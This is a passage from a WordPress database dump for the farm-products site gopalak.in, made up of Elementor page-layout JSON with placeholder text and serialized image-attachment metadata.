rl\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"2f0ac23\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"ec43a70\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=XHOmBV4js_E\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ca8c599\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"f8ca017\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"da25a76\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"216af8d\",\"elType\":\"section\",\"settings\":{\"structure\":\"21\"},\"elements\":[{\"id\":\"882c92e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"772bd0e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Gallery\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fbf7c50\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2c59178\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"29d5b45\",\"elType\":\"widget\",\"settings\":{\"carousel\":[{\"id\":1340,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/banner1.jpg\"},{\"id\":1354,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\"},{\"id\":1339,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/cows-farming-on-green-meadow-260nw-1704884002-e1663753177624.webp\"},{\"id\":1355,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\"},{\"id\":1357,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\"}]},\"elements\":[],\"widgetType\":\"image-carousel\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f9dd695\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"0f89775\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"66d5270\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5d24ace\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"},\"background_repeat\":\"no-repeat\",\"background_size\":\"initial\",\"padding\":{\"unit\":\"px\",\"top\":\"00\",\"right\":\"100\",\"bottom\":\"80\",\"left\":\"100\",\"isLinked\":false},\"background_position\":\"initial\",\"background_ypos\":{\"unit\":\"px\",\"size\":-220,\"sizes\":[]}},\"elements\":[{\"id\":\"eb82b0e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"90\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"7af9c58\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"73daaad\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4><strong>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.<\\/strong><\\/h4>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"6345fb6\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"background_color\":\"#FFAA00\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7410379\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#001B06\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"b43ead7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5282e6a\",\"elType\":\"widget\",\"settings\":{\"title\":\"Address\",\"header_size\":\"h4\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6d3c6b7\",\"elType\":\"widget\",\"settings\":{\"title\":\" B-55, NGEF Industrial Ancillary Estate, <br>Mahadevapura, Bangalore 560048<br>\\nContact : (+91)7259272171<br>\\nE-mail id: mango@homedirect.in\",\"header_size\":\"span\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false}]'),(8981,1541,'_elementor_page_assets','a:0:{}'),(8994,1543,'_wp_attached_file','2022/10/Group-122.png'),(8995,1543,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:960;s:6:\"height\";i:1010;s:4:\"file\";s:21:\"2022/10/Group-122.png\";s:8:\"filesize\";i:57003;s:5:\"sizes\";a:8:{s:6:\"medium\";a:5:{s:4:\"file\";s:21:\"Group-122-285x300.png\";s:5:\"width\";i:285;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:17094;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:21:\"Group-122-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:7572;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:21:\"Group-122-768x808.png\";s:5:\"width\";i:768;s:6:\"height\";i:808;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:54070;}s:21:\"woocommerce_thumbnail\";a:6:{s:4:\"file\";s:21:\"Group-122-320x320.png\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:17970;s:9:\"uncropped\";b:0;}s:18:\"woocommerce_single\";a:5:{s:4:\"file\";s:19:\"Group-122-50x53.png\";s:5:\"width\";i:50;s:6:\"height\";i:53;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:2095;}s:29:\"woocommerce_gallery_thumbnail\";a:5:{s:4:\"file\";s:21:\"Group-122-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:4663;}s:15:\"thaps-thumb-img\";a:5:{s:4:\"file\";s:19:\"Group-122-48x51.png\";s:5:\"width\";i:48;s:6:\"height\";i:51;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:1962;}s:16:\"taiowc-thumb-img\";a:5:{s:4:\"file\";s:19:\"Group-122-48x51.png\";s:5:\"width\";i:48;s:6:\"height\";i:51;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:1962;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(8998,1544,'_wp_attached_file','2022/10/gopalak-B1-copy.jpg'),(8999,1544,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1263;s:6:\"height\";i:416;s:4:\"file\";s:27:\"2022/10/gopalak-B1-copy.jpg\";s:8:\"filesize\";i:43130;s:5:\"sizes\";a:9:{s:6:\"medium\";a:5:{s:4:\"file\";s:26:\"gopalak-B1-copy-300x99.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:99;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:18449;}s:5:\"large\";a:5:{s:4:\"file\";s:28:\"gopalak-B1-copy-1024x337.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:337;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:65734;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:27:\"gopalak-B1-copy-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:15445;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:27:\"gopalak-B1-copy-768x253.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:253;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:45505;}s:21:\"woocommerce_thumbnail\";a:6:{s:4:\"file\";s:27:\"gopalak-B1-copy-320x320.jpg\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:25286;s:9:\"uncropped\";b:0;}s:18:\"woocommerce_single\";a:5:{s:4:\"file\";s:25:\"gopalak-B1-copy-50x16.jpg\";s:5:\"width\";i:50;s:6:\"height\";i:16;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:11254;}s:29:\"woocommerce_gallery_thumbnail\";a:5:{s:4:\"file\";s:27:\"gopalak-B1-copy-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:13372;}s:15:\"thaps-thumb-img\";a:5:{s:4:\"file\";s:25:\"gopalak-B1-copy-48x16.jpg\";s:5:\"width\";i:48;s:6:\"height\";i:16;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:11242;}s:16:\"taiowc-thumb-img\";a:5:{s:4:\"file\";s:25:\"gopalak-B1-copy-48x16.jpg\";s:5:\"width\";i:48;s:6:\"height\";i:16;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:11242;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(9002,1545,'_elementor_edit_mode','builder'),(9003,1545,'_elementor_template_type','wp-page'),(9004,1545,'_elementor_version','3.7.8'),(9005,1545,'_wp_page_template','elementor_canvas'),(9006,1545,'_elementor_data','[{\"id\":\"2bcecd0\",\"elType\":\"section\",\"settings\":{\"structure\":\"70\",\"background_background\":\"classic\",\"background_color\":\"#006505\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"08c3f0f\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"98c2def\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"\",\"id\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"150\",\"height\":\"150\"},\"link_to\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"3439158\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":32.792000000000002},\"elements\":[],\"isInner\":false},{\"id\":\"f29b88a\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":9.5269999999999992},\"elements\":[{\"id\":\"049c5ad\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/home\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5af2fa6\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":6.8070000000000004},\"elements\":[{\"id\":\"59347f6\",\"elType\":\"widget\",\"settings\":{\"text\":\"shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"1609351\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":10.93},\"elements\":[{\"id\":\"39fe47a\",\"elType\":\"widget\",\"settings\":{\"text\":\"About us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/home\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b5a07d3\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":12.159000000000001},\"elements\":[{\"id\":\"6a4419e\",\"elType\":\"widget\",\"settings\":{\"text\":\"Contact us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/home\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b366bab\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":12.058999999999999},\"elements\":[{\"id\":\"4c45b22\",\"elType\":\"widget\",\"settings\":{\"text\":\"My Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1fbbc13\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\",\"id\":1355,\"alt\":\"\",\"source\":\"library\"},\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"77\",\"left\":\"0\",\"isLinked\":false},\"background_slideshow_gallery\":[{\"id\":1357,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\"},{\"id\":1355,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\"},{\"id\":1356,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/abstract-background-wheat-farm-wallpaper-51701325.jpg\"}]},\"elements\":[{\"id\":\"945df22\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"104\",\"isLinked\":false}},\"elements\":[{\"id\":\"5a1c0c9\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":true},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-17\",\"bottom\":\"0\",\"left\":\"-27\",\"isLinked\":false}},\"elements\":[{\"id\":\"3ed0437\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":8.9529999999999994},\"elements\":[],\"isInner\":true},{\"id\":\"26b984b\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":91,\"background_background\":\"classic\",\"background_color\":\"#0000007D\",\"margin\":{\"unit\":\"px\",\"top\":\"187\",\"right\":\"0\",\"bottom\":\"-40\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"5\",\"isLinked\":false}},\"elements\":[{\"id\":\"979ed75\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"title_color\":\"#FFFFFF\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"4b78a11\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.<\\/p>\",\"text_color\":\"#FFFFFF\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"970607c\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"background_color\":\"#F78A00\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d5b9324\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e372b45\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ce9e678\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"623a672\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":976,\"sizes\":[]},\"structure\":\"40\"},\"elements\":[{\"id\":\"739cf25\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"background_background\":\"classic\",\"border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[{\"id\":\"d837b3b\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"1536x1536\",\"thumbnail_custom_dimension\":{\"width\":\"1200\",\"height\":\"800\"},\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"text_align\":\"center\",\"title_bottom_space\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#3AB2A7\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"4b8356a\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"_margin\":{\"unit\":\"px\",\"top\":\"-21\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"4cb627c\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"background_background\":\"classic\"},\"elements\":[{\"id\":\"fafaf1c\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"1536x1536\",\"thumbnail_custom_dimension\":{\"width\":\"1200\",\"height\":\"800\"},\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"text_align\":\"center\",\"title_bottom_space\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#092220\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"0775f80\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"_margin\":{\"unit\":\"px\",\"top\":\"-21\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5913281\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"f899190\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"1536x1536\",\"thumbnail_custom_dimension\":{\"width\":\"1200\",\"height\":\"800\"},\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"text_align\":\"center\",\"title_bottom_space\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#2EB7BC\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"8a4dc1c\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"_margin\":{\"unit\":\"px\",\"top\":\"-21\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5270078\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"6ac0016\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"1536x1536\",\"thumbnail_custom_dimension\":{\"width\":\"1200\",\"height\":\"800\"},\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"text_align\":\"center\",\"title_bottom_space\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#2EB7BC\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"9200df5\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"_margin\":{\"unit\":\"px\",\"top\":\"-21\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7107c53\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"c67e6d7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e70fe37\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"11aef9e\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":904,\"sizes\":[]},\"structure\":\"22\"},\"elements\":[{\"id\":\"2d9f268\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"86a6968\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"title_color\":\"#264D5D\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"aa78264\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"67983f0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8e299f1\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#324735\",\"_margin\":{\"unit\":\"px\",\"top\":\"49\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"23d3073\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"7d36be0\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e43f473\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":71,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1c1c876\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"background_background\":\"classic\",\"background_color\":\"#D8CDCD52\"},\"elements\":[{\"id\":\"4b90a4b\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"dee4139\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=XHOmBV4js_E\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"2f0ac23\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"ec43a70\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=XHOmBV4js_E\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ca8c599\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"f8ca017\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"da25a76\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"216af8d\",\"elType\":\"section\",\"settings\":{\"structure\":\"21\"},\"elements\":[{\"id\":\"882c92e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"772bd0e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Gallery\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fbf7c50\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2c59178\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"29d5b45\",\"elType\":\"widget\",\"settings\":{\"carousel\":[{\"id\":1340,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/banner1.jpg\"},{\"id\":1354,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\"},{\"id\":1339,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/cows-farming-on-green-meadow-260nw-1704884002-e1663753177624.webp\"},{\"id\":1355,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\"},{\"id\":1357,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\"}]},\"elements\":[],\"widgetType\":\"image-carousel\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f9dd695\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"0f89775\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"66d5270\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5d24ace\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"